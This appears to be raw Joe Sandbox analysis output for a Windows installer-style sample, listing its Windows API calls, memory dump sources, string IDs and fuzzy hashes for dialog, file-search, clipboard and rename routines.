                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                          • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                          • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                          • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                          • GlobalFree.KERNEL32(?), ref: 004051FC
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                          • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                          • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                          • ShowWindow.USER32(00000000), ref: 004053AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                          • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                          • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                          • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,00437800,774D2EE0,00000000), ref: 00405B23
                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B6B
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B8E
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405B94
                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,774D2EE0,00000000), ref: 00405BA4
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                          • FindClose.KERNEL32(00000000), ref: 00405C53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: 0WB$\*.*
                                                          • API String ID: 2035342205-351390296
                                                          • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                          • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                          • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                          • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                          • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                          • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                          • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,774D2EE0,00405B1A,?,00437800,774D2EE0), ref: 00406736
                                                          • FindClose.KERNEL32(00000000), ref: 00406742
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: xgB
                                                          • API String ID: 2295610775-399326502
                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                          • GetClientRect.USER32(?,?), ref: 00405639
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                          • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                            • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                          • ShowWindow.USER32(00000000), ref: 00405788
                                                          • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                          • ShowWindow.USER32(00000008), ref: 004057D7
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                          • CreatePopupMenu.USER32 ref: 0040581C
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                          • GetWindowRect.USER32(?,?), ref: 00405850
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                          • OpenClipboard.USER32(00000000), ref: 004058B1
                                                          • EmptyClipboard.USER32 ref: 004058B7
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                          • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                          • CloseClipboard.USER32 ref: 00405912
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: (7B${
                                                          • API String ID: 590372296-525222780
                                                          • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                          • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                          • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                          • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                          • ShowWindow.USER32(?), ref: 00403EDF
                                                          • DestroyWindow.USER32 ref: 00403EF3
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                          • GetDlgItem.USER32(?,?), ref: 00403F30
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                          • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                          • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                          • ShowWindow.USER32(00000000,?), ref: 00404135
                                                          • EnableWindow.USER32(?,?), ref: 00404147
                                                          • EnableWindow.USER32(?,?), ref: 00404162
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                          • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                          • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                          • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: (7B
                                                          • API String ID: 184305955-3251261122
                                                          • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                          • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                          • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                          • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                          APIs
                                                            • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                            • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                          • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,774D3420,00435000,00000000), ref: 00403B59
                                                          • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                          • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                          • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                          • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                          • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                          • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-1425696872
                                                          • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                          • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                          • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                          • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                          • GetSysColor.USER32(?), ref: 004045FE
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                          • lstrlenW.KERNEL32(?), ref: 0040461F
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                          • SendMessageW.USER32(00000000), ref: 004046A1
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                          • SetCursor.USER32(00000000), ref: 00404720
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                          • SetCursor.USER32(00000000), ref: 0040473C
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: N
                                                          • API String ID: 3103080414-1130791706
                                                          • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                          • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                          • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                          • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                          • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                          • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                          • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                          • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                            • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                            • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                            • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                            • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                            • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: (7B$A
                                                          • API String ID: 2624150263-3645020878
                                                          • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                          • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                          • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                          • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                            • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                          • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                          • wsprintfA.USER32 ref: 004060B3
                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                          • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                          • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                            • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                            • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2114217917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000003.00000002.2114195458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114243803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114270865.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000003.00000002.2114305090.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_4AMVusDMPP.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
